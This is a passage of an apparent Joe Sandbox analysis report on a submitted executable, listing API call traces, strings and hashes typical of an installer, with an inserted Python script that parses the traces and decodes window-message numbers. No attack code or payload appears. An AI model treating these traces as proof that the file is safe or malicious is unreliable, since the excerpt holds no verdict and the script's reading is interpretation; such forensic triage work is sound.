                                                            • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                          • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                          • wsprintfA.USER32 ref: 004060B3
                                                          • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                          • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                          • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                            • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\4AMVusDMPP.exe,80000000,00000003), ref: 00405EE2
                                                            • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                           Memory Dump Source
                                                           • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
                                                          • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                          • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                          • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                          • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                          • GetSysColor.USER32(00000000), ref: 00404421
                                                          • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                          • SetBkMode.GDI32(?,?), ref: 00404439
                                                          • GetSysColor.USER32(?), ref: 0040444C
                                                          • SetBkColor.GDI32(?,?), ref: 0040445C
                                                          • DeleteObject.GDI32(?), ref: 00404476
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                          • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                          • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                          APIs
                                                          • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                          • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                          • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                          • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                          • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                          • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                          • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-2950451457
                                                          • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                          • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                          • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                          • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                          • GetTickCount.KERNEL32 ref: 00402EC7
                                                          • wsprintfW.USER32 ref: 00402EF5
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                            • Part of subcall function 00402E72: MulDiv.KERNEL32(00016390,00000064,00018D7D), ref: 00402E87
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                          • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                          • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                          • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                          • GetMessagePos.USER32 ref: 00404D3D
                                                          • ScreenToClient.USER32(?,?), ref: 00404D57
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
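The two SendMessageW groups above (list-view messages 0x1004, 0x104D and 0x1013 at call sites 004054E3 to 0040550B, and tree-view messages 0x110A, 0x1111 and 0x113E at 00404D35 to 00404D8F) are easier to read once the raw message numbers are resolved to their names from commctrl.h. The Python script below is added here as a triage aid; it is not part of the Joe Sandbox report or its tooling. It parses API lines written in this report's "APIs" format into structured records, resolves SendMessageW message numbers for the constants that appear on this page (LVM_FIRST = 0x1000, TV_FIRST = 0x1100), and counts call sites per module. The sample input is constructed from lines on this page; the message table covers only those constants and would need extending from commctrl.h for other reports.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: API lines copied in the report's own "APIs" format.
SAMPLE = """\
• lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
• SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
• SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
• GetTickCount.KERNEL32 ref: 00402EC7
  • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
"""

# One line of the "APIs" section: optional subcall prefix, Api.MODULE(args), ref: address.
# The format is assumed from the lines on this page, not from a published schema.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Common-control message numbers from commctrl.h for the constants seen on this page.
WINDOW_MESSAGES = {
    0x1000 + 4: "LVM_GETITEMCOUNT",
    0x1000 + 19: "LVM_ENSUREVISIBLE",
    0x1000 + 77: "LVM_INSERTITEMW",
    0x1100 + 10: "TVM_GETNEXTITEM",
    0x1100 + 17: "TVM_HITTEST",
    0x1100 + 62: "TVM_GETITEMW",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                    # call-site address
    subcall_of: Optional[int]   # callee address for "Part of subcall function" lines


def parse_hex(token: str) -> Optional[int]:
    """Integer value of an 8-digit hex argument, or None for '?' and any other
    token the report did not resolve to a literal."""
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", token) else None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API line in text; non-matching lines are skipped.
    Arguments are split on commas, so a string argument containing a comma
    would be split as well (none of the lines on this page has one)."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append(ApiCall(
            name=m.group("name"),
            module=m.group("module"),
            args=args.split(",") if args else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def decode_messages(calls: List[ApiCall]) -> List[Tuple[int, str, Optional[int]]]:
    """For each SendMessageW call with a literal message number, return
    (call site, message name or hex if unknown, wParam or None if unresolved)."""
    out = []
    for c in calls:
        if c.name != "SendMessageW" or len(c.args) < 2:
            continue
        msg = parse_hex(c.args[1])
        if msg is None:
            continue
        wparam = parse_hex(c.args[2]) if len(c.args) > 2 else None
        out.append((c.ref, WINDOW_MESSAGES.get(msg, f"0x{msg:04X}"), wparam))
    return out


def count_by_module(calls: List[ApiCall]) -> dict:
    """Number of call sites per imported module, e.g. {'USER32': 7, 'KERNEL32': 3}."""
    counts: dict = {}
    for c in calls:
        counts[c.module] = counts.get(c.module, 0) + 1
    return counts


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for ref, msg_name, wparam in decode_messages(parsed):
        print(f"{ref:08X}  {msg_name:<18} wParam={wparam}")
    print(count_by_module(parsed))
```

Run as a script it prints the six decoded messages and the per-module histogram. Read together, the list-view sequence (get item count, insert item, ensure visible) is consistent with code appending a line to a details list, and the tree-view sequence (TVM_GETNEXTITEM with wParam 9, which is TVGN_CARET, then hit-test and get item) with a handler reading the selected tree node; that reading is an interpretation of the message names, not something the report itself states.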
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                          • wsprintfW.USER32 ref: 00402E45
                                                          • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                          • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                          • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                          • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                          APIs
                                                            • Part of subcall function 6EAB121B: GlobalAlloc.KERNELBASE(00000040,?,6EAB123B,?,6EAB12DF,00000019,6EAB11BE,-000000A0), ref: 6EAB1225
                                                          • GlobalFree.KERNEL32(?), ref: 6EAB2657
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB268C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                           • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: bb6187d69716f0cd67e8133cb85cc4ea2abdd61eb98c379194c426dd57771aca
                                                          • Instruction ID: b71fd960ccead8e693c338b07ae09dcb058d1d423278abffccb3af73600c0ed8
                                                          • Opcode Fuzzy Hash: bb6187d69716f0cd67e8133cb85cc4ea2abdd61eb98c379194c426dd57771aca
                                                          • Instruction Fuzzy Hash: 5031CD31904601DFCB148F98C8A4C6A7BBEFF8630471586AAF5419B260E7349C96CB29
                                                          APIs
                                                          • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                          • wsprintfW.USER32 ref: 00404CB6
                                                          • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$(7B
                                                          • API String ID: 3540041739-1320723960
                                                          • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                          • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                          • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                          • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWidelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsc34E8.tmp$C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll
                                                          • API String ID: 3109718747-997066553
                                                          • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                          • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                          • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                          • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                           • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 97dbd4792118fc9470dcd73a609fcd01680607c51e21deda42927cae4d26b044
                                                          • Instruction ID: 8d01cb560023a0545a23a74334ace5dff5b3f3a46ecc6bf17bc13e0eaf0d33ae
                                                          • Opcode Fuzzy Hash: 97dbd4792118fc9470dcd73a609fcd01680607c51e21deda42927cae4d26b044
                                                          • Instruction Fuzzy Hash: 81510631D1005AAE8B409FE985C05BEBBBDEF65314B54425ED400A3204D772BEC987AD
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB24D6
                                                            • Part of subcall function 6EAB122C: lstrcpynW.KERNEL32(00000000,?,6EAB12DF,00000019,6EAB11BE,-000000A0), ref: 6EAB123C
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 6EAB245C
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6EAB2477
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 4216380887-0
                                                          • Opcode ID: 8083b59309b82d6a50fe7367600a47680ae7eaaa759dc4bb8294224db4045607
                                                          • Instruction ID: af91af7aa0cbe86092c516ce7556d85006e6c6c592d27a64ee4a515b6bd23f33
                                                          • Opcode Fuzzy Hash: 8083b59309b82d6a50fe7367600a47680ae7eaaa759dc4bb8294224db4045607
                                                          • Instruction Fuzzy Hash: 0341BFB0408705DFD710DFA5D844AA677BCFF5A310F10892EE4468BA51EB74A8C6CB79
                                                          APIs
